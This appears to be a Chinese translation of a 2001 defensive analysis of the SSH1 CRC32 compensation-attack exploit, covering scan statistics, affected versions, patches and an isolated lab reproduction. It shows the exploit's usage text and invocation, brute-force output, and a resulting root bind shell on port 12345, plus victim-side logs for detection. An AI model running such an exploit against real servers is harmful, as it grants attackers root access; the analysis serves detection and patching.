![[ 永遠的UNIX::UNIX技術資料的寶庫 ]](/images/title.gif) GB | BIG5
|
| 首頁 > 安全技術 > 程序 > 正文 |
 |
| 對SSH crc32 compensation attack detector exploit 的分析 |
| 本文出自:http://xfocus.org 作者: xundi@xfocus.org (2002-08-05 06:02:00) |
由SSH crc32 compensation attack detector exploit代碼的流傳開來,對
SSH的掃描也越來越多,這是一份統計報表:
+------------+------------+----------+----------+-----------+
| date | #Probes | #Sources | #Targets | #Scanners |
+------------+------------+----------+----------+-----------+
| 2001-10-03 | 1466 | 45 | 987 | |
| 2001-10-04 | 319 | 25 | 212 | |
| 2001-10-05 | 825 | 22 | 783 | |
| 2001-10-06 | 86552 | 27 | 86305 | |
| 2001-10-07 | 7564 | 29 | 7429 | |
| 2001-10-08 | 2506 | 29 | 2449 | |
| 2001-10-09 | 1010 | 18 | 263 | |
| 2001-10-10 | 480 | 39 | 307 | |
| 2001-10-11 | 978 | 31 | 504 | |
| 2001-10-12 | 436 | 21 | 311 | |
| 2001-10-13 | 6731 | 27 | 6353 | |
| 2001-10-14 | 1411 | 29 | 1084 | |
| 2001-10-15 | 936 | 34 | 723 | |
| 2001-10-16 | 1358 | 40 | 1256 | |
| 2001-10-17 | 1098 | 36 | 899 | |
| 2001-10-18 | 1779 | 31 | 1438 | |
| 2001-10-19 | 19722 | 28 | 19573 | 7 |
| 2001-10-20 | 25539 | 21 | 25419 | 3 |
| 2001-10-21 | 6796 | 26 | 6750 | 9 |
| 2001-10-22 | 807 | 30 | 482 | 5 |
| 2001-10-23 | 578 | 49 | 327 | 6 |
| 2001-10-24 | 2198 | 39 | 2025 | 9 |
| 2001-10-25 | 2368 | 31 | 1759 | 6 |
| 2001-10-26 | 712 | 37 | 591 | 7 |
| 2001-10-27 | 463 | 30 | 297 | 8 |
| 2001-10-28 | 495 | 30 | 263 | 5 |
| 2001-10-29 | 478 | 37 | 399 | 5 |
| 2001-10-30 | 1154 | 48 | 1051 | 5 |
| 2001-10-31 | 1998 | 46 | 1047 | 5 |
| 2001-11-01 | 66660 | 46 | 66386 | 5 |
| 2001-11-02 | 1514 | 40 | 926 | 5 |
| 2001-11-03 | 2142 | 36 | 2047 | 8 |
| 2001-11-04 | 1233 | 26 | 781 | 9 |
+------------+------------+----------+----------+-----------+
鑒此情況,編譯整理David A. Dittrich <dittrich@cac.washington.edu> 文章
(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家參考和修補。
-------------------------------------------------------------------------------
概述
==================
此漏洞最開始由CORE-SDI組織在securityfocus.com上的BUGTRAQ上發布了他們安全
公告CORE-20010207,日期為2001,2月8號:
http://www.securityfocus.com/advisories/3088
漏洞的簡單描述就是:ssh1守護程序中所帶的一段代碼中存在一個整數溢出問題。問題出在
deattack.c,此程序由CORE SDI開發,用來防止SSH1協議受到CRC32補償攻擊。
由在detect_attack()函數中錯誤的將一個16位的無符號變量當成了32位變量來使用,
導致表索引溢出問題。
這將允許一個攻擊者覆蓋內存中的任意位置的內容,攻擊者可能遠程獲取root權限。
其他組織也陸續公布了一些對這個SSH 漏洞的分析和建議如:
http://xforce.iss.net/alerts/advise100.php
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
http://www.securityfocus.com/bugid=2347
而在2001年10月21號Jay Dyson在incidents@securityfocus.com郵件列表上聲明
有不少信息顯示有人在掃描RIPE 網絡段的SSH服務器:
http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1
然更甚的是在vuln-dev@securityfocus.com郵件列表中提示Newsbytes.com中
有新聞描述有人願付$1000美金的人提供此攻擊工具。還有沒有確認的傳聞針對
Solaris 8/SPARC SSH.com 1.2.26-31 系統的攻擊代碼也存在。名的安全站點
securitynewsportal.com就被這個漏洞攻擊,下面地址是被黑截圖:
http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/
最近TESO發布了關這些攻擊代碼的信息,你可以在下面的地址查看:
http://www.team-teso.org/sshd_statement.php
下面是受影響的SSH版本:
SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7
不過供應商已經為系統提供補丁信息,大家可以參考如下地址:
http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
http://openssh.org/security.html
http://www.cisco.com/warp/public/707/SSH-multiple-pub.html
---------------------------------------------------------------------------
攻擊行為的分析
=====================
2001年10月6日,攻擊者從Netherlands網絡段使用crc32 compensation attack
detector漏洞攻擊程序入侵了一台UW網絡中使用了OpenSSH 2.1.1的Redhat linux
系統,漏洞描述如CERT VU#945216所述:
http://www.kb.cert.org/vuls/id/945216
系統中一系列操作系統命令被替換成木馬程序以提供以再次進入並清除了所有
日志系統。第二台SSH服務器運行在39999/tcp高端口,系統入侵被用來掃描其他
UW以外的網絡以獲得更多的運行OpenSSH 2.1.1的系統。
通過一些恢復操作對這個漏洞程序進行了分析:
這個攻擊代碼基OpenSSH 2.2.0版本(這個是2.1.1之的版本,對crc32
compensation attack detection function進行了修補),不過針對OpenSSH
2.1.1進行攻擊,其攻擊代碼也可以使用在ssh.com 1.2.31版本(針對其他SSH
協議1 和版本的測試尚無完成)。
攻擊代碼對針對如下系統:
linux/x86 ssh.com 1.2.26-1.2.31 rhl
linux/x86 openssh 1.2.3 (maybe others)
linux/x86 openssh 2.2.0p1 (maybe others)
freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
雖然這個攻擊代碼可以對多個平台系統進行攻擊,這裡攻擊者只掃描22/tcp端口,
然連接這些系統獲得響應的版本程序並只對"OpenSSH_2.1.1"繼續進一步操作。
這些掃描使用快速SYN掃描,使用來自t0rn root kit中的工具。
對破壞的系統進行分析發現已經有47067個地址被掃描,而在這些地址中,有1244
個主機被鑒別存在此漏洞,攻擊者成功的在8月8日系統離線之前利用此漏洞進入
4個主機。
這個攻擊者代碼對使用訪問控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"
設置) 或者包過濾(如, ipchains, iptables, ipf) 的系統不能正常工作,因為這些
會要求交換Public keys。
-------------------------------------------------------------------------
對攻擊者代碼實時的分析
============================
此攻擊代碼在隔離的網絡段進行測試,使用了網絡地址為10.10.10.0/24,攻擊
主機使用了10.10.10.10 而有漏洞的服務主機為 10.10.10.3。
有漏洞的服務主機系統運行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)
的SSH.com的 1.2.31 版本。
而攻擊主機運行了Fred Cohen's PLAC[1] (從CD-ROM引導的Linux 2.4.5 系統),
文件使用"nc"(Netcat)[2]拷貝到系統中.
攻擊一方再現
=========================
當以沒有任何參數運行攻擊代碼的時候會顯示使用信息:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
**please pick a type**
Usage: ./ssh host [options]
Options:
-p port
-b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
-t type
-d debug mode
-o Add this to delta_min
types:
0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
被測試系統在系統端口2222上運行著SSH.com version 1.2.31 (未修補)程序,並
把syslog日志重定向獨立的文件sshdx.log.
這裡選擇了類型type 0和2222 攻擊端口:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................|////////\\\\!
bruteforced h->ident buff distance: 5bfbed88
trying retloc_delta: 35
....!
found high words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b
......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
這裡看來,攻擊攻擊相似被"停止"了,返回被攻擊系統查看卻發現被開了門。
被測試系統一方再現
=======================
在利用漏洞之前,被測試系統顯示標準SSH守護程序運行在22/tcp端口,要被
測試的應用程序運行在2222/tcp端口,兩個都在監聽狀態,而且標準SSH守護
程序有一個外部連接(10.10.10.2:33354),通過netstat查看如下:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
而在攻擊程序"停止"以,再用netstat查看網絡監聽狀態如下:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
發現有新的服務在12345/tcp端口監聽。
返回攻擊者主機,使用netstat查看網絡狀態,發現程序使用了暴力猜測地址
方式攻擊:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
而使用LiSt Open Files ("lsof")[4]工具顯示被測試的SSH守護程序開啟了一個
新的監聽端口:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 9364 root cwd DIR 3,3 1024 2 /
sshd 9364 root rtd DIR 3,3 1024 2 /
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so
sshd 9364 root 0u CHR 1,3 4110 /dev/null
sshd 9364 root 1u CHR 1,3 4110 /dev/null
sshd 9364 root 2u CHR 1,3 4110 /dev/null
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)
sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
很明顯,攻擊程序成功利用此漏洞獲得ROOT SHELL,並綁定了一個高端TCP端口。
這樣攻擊者可以使用任何"telnet"或者"rc"工具連接到此端口並以超級用戶的
方式執行任意命令,如下所示:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[注意]:使用telnet要加";"號,而nc連接不需要。
等攻擊者退出以,被測試系統網絡狀態返回正常:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
如果syslog日志功能開啟了,連接和暴力測試的信息全部會記錄下來(注意,這個是
對SSH.com 1.2.31在Red Hat LInux 6.0上的測試 -- 日志標志會和記錄OpenSSH
不一樣):
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
